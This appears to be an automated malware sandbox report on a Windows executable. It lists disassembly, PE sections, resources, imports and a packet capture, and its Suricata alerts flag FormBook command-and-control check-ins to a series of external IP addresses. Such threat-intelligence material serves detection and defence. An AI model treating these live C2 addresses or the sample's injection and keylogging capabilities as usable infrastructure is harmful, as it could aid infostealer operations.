jne 00007F4324F18760h
bt dword ptr [004BF324h], 01h
jc 00007F4324F18C30h
bt dword ptr [004C41FCh], 00000000h
jnc 00007F4324F188FDh
test edi, 00000003h
jne 00007F4324F1890Eh
test esi, 00000003h
jne 00007F4324F188EDh
bt edi, 02h
jnc 00007F4324F1875Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F4324F18763h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F4324F187B5h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x583b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x121000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x583b0	0x58400	7d4523ebea75235da8616487d1ebb2a1	False	0.925880842776204	data	7.889464962510561	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x121000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc85a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc86d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc87f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc8920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc8c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc8d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc9bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xca480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xca9e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xccf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xce038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xce4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xce4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcea84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcf110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcf5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcfb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xd01f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd0660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd07b8	0x4f676	data			1.0003259151759634
RT_GROUP_ICON	0x11fe30	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x11fea8	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x11febc	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x11fed0	0x14	data	English	Great Britain	1.25
RT_VERSION	0x11fee4	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x11ffc0	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-05T09:05:27.891869+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.22	49161	148.72.152.174	80	TCP
2024-09-05T09:05:27.891869+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.22	49161	148.72.152.174	80	TCP
2024-09-05T09:05:42.987458+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49165	3.33.130.190	80	TCP
2024-09-05T09:05:45.537570+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49166	3.33.130.190	80	TCP
2024-09-05T09:05:48.527465+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.22	49167	3.33.130.190	80	TCP
2024-09-05T09:05:48.527465+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.22	49167	3.33.130.190	80	TCP
2024-09-05T09:05:53.892004+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49168	172.191.244.62	80	TCP
2024-09-05T09:05:56.458808+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49169	172.191.244.62	80	TCP
2024-09-05T09:05:59.459154+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.22	49170	172.191.244.62	80	TCP
2024-09-05T09:05:59.459154+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.22	49170	172.191.244.62	80	TCP
2024-09-05T09:06:04.534266+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49171	172.96.191.39	80	TCP
2024-09-05T09:06:07.089987+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49172	172.96.191.39	80	TCP
2024-09-05T09:06:11.202499+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.22	49173	172.96.191.39	80	TCP
2024-09-05T09:06:11.202499+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.22	49173	172.96.191.39	80	TCP
2024-09-05T09:06:16.346526+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49174	217.70.184.50	80	TCP
2024-09-05T09:06:18.890592+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49175	217.70.184.50	80	TCP
2024-09-05T09:06:22.024820+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.22	49176	217.70.184.50	80	TCP
2024-09-05T09:06:22.024820+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.22	49176	217.70.184.50	80	TCP
2024-09-05T09:06:27.227650+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49177	63.250.47.40	80	TCP
2024-09-05T09:06:29.765024+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49178	63.250.47.40	80	TCP
2024-09-05T09:06:32.878403+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.22	49179	63.250.47.40	80	TCP
2024-09-05T09:06:32.878403+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.22	49179	63.250.47.40	80	TCP
2024-09-05T09:06:37.968544+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49180	91.184.0.200	80	TCP
2024-09-05T09:06:40.509786+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49181	91.184.0.200	80	TCP
2024-09-05T09:06:43.664334+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.22	49182	91.184.0.200	80	TCP
2024-09-05T09:06:43.664334+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.22	49182	91.184.0.200	80	TCP
2024-09-05T09:06:48.756890+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49183	13.248.169.48	80	TCP
2024-09-05T09:06:51.306706+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49184	13.248.169.48	80	TCP
2024-09-05T09:06:54.315526+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.22	49185	13.248.169.48	80	TCP
2024-09-05T09:06:54.315526+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.22	49185	13.248.169.48	80	TCP
2024-09-05T09:07:10.603208+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49189	43.242.202.169	80	TCP
2024-09-05T09:07:13.148035+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49190	43.242.202.169	80	TCP
2024-09-05T09:07:16.545704+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.22	49191	43.242.202.169	80	TCP
2024-09-05T09:07:16.545704+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.22	49191	43.242.202.169	80	TCP
2024-09-05T09:07:27.812750+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49192	103.224.182.242	80	TCP
2024-09-05T09:07:30.359586+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49193	103.224.182.242	80	TCP
2024-09-05T09:07:33.552398+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.22	49194	103.224.182.242	80	TCP
2024-09-05T09:07:33.552398+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.22	49194	103.224.182.242	80	TCP
2024-09-05T09:07:38.722588+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49195	85.159.66.93	80	TCP
2024-09-05T09:07:41.276315+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49196	85.159.66.93	80	TCP
2024-09-05T09:07:44.480897+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.22	49197	85.159.66.93	80	TCP
2024-09-05T09:07:44.480897+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.22	49197	85.159.66.93	80	TCP
2024-09-05T09:07:49.807611+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49198	188.114.96.3	80	TCP
2024-09-05T09:07:52.584880+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.22	49199	188.114.96.3	80	TCP
2024-09-05T09:07:56.091735+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.22	49200	188.114.96.3	80	TCP
2024-09-05T09:07:56.091735+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.22	49200	188.114.96.3	80	TCP

Network Port Distribution

Total Packets: 629
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 5, 2024 09:05:27.363818884 CEST	49161	80	192.168.2.22	148.72.152.174
Sep 5, 2024 09:05:27.368664026 CEST	80	49161	148.72.152.174	192.168.2.22
Sep 5, 2024 09:05:27.368727922 CEST	49161	80	192.168.2.22	148.72.152.174
Sep 5, 2024 09:05:27.377155066 CEST	49161	80	192.168.2.22	148.72.152.174
Sep 5, 2024 09:05:27.381958008 CEST	80	49161	148.72.152.174	192.168.2.22
Sep 5, 2024 09:05:27.891539097 CEST	80	49161	148.72.152.174	192.168.2.22
Sep 5, 2024 09:05:27.891762972 CEST	80	49161	148.72.152.174	192.168.2.22
Sep 5, 2024 09:05:27.891869068 CEST	49161	80	192.168.2.22	148.72.152.174
Sep 5, 2024 09:05:27.902687073 CEST	49161	80	192.168.2.22	148.72.152.174
Sep 5, 2024 09:05:27.907566071 CEST	80	49161	148.72.152.174	192.168.2.22
Sep 5, 2024 09:05:32.778995037 CEST	49162	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:32.783768892 CEST	80	49162	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:32.783838034 CEST	49162	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:32.783996105 CEST	49162	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:32.788755894 CEST	80	49162	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:33.413702965 CEST	80	49162	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:33.413716078 CEST	80	49162	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:33.413724899 CEST	80	49162	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:33.413844109 CEST	49162	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:33.712241888 CEST	49162	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:33.717025042 CEST	80	49162	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:35.039882898 CEST	49163	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:35.048285961 CEST	80	49163	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:35.048460007 CEST	49163	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:35.048686981 CEST	49163	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:35.054158926 CEST	80	49163	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:35.570339918 CEST	80	49163	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:35.570414066 CEST	49163	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:35.570457935 CEST	80	49163	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:35.570502043 CEST	49163	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:35.583801985 CEST	49163	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:35.588852882 CEST	80	49163	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:35.735099077 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:35.739995003 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:35.740102053 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:35.740256071 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:35.745100975 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.251974106 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.252047062 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.252147913 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.252192020 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.252242088 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.252254009 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.252268076 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.252280951 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.252299070 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.252305984 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.253314972 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.253325939 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.253344059 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.253355026 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.253355980 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.253367901 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.253369093 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.253376961 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.253392935 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.253424883 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.259322882 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.259335041 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.259370089 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.259413958 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.259455919 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.269613981 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.339855909 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.339869976 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.339895010 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.339906931 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.339920044 CEST	80	49164	45.33.6.223	192.168.2.22
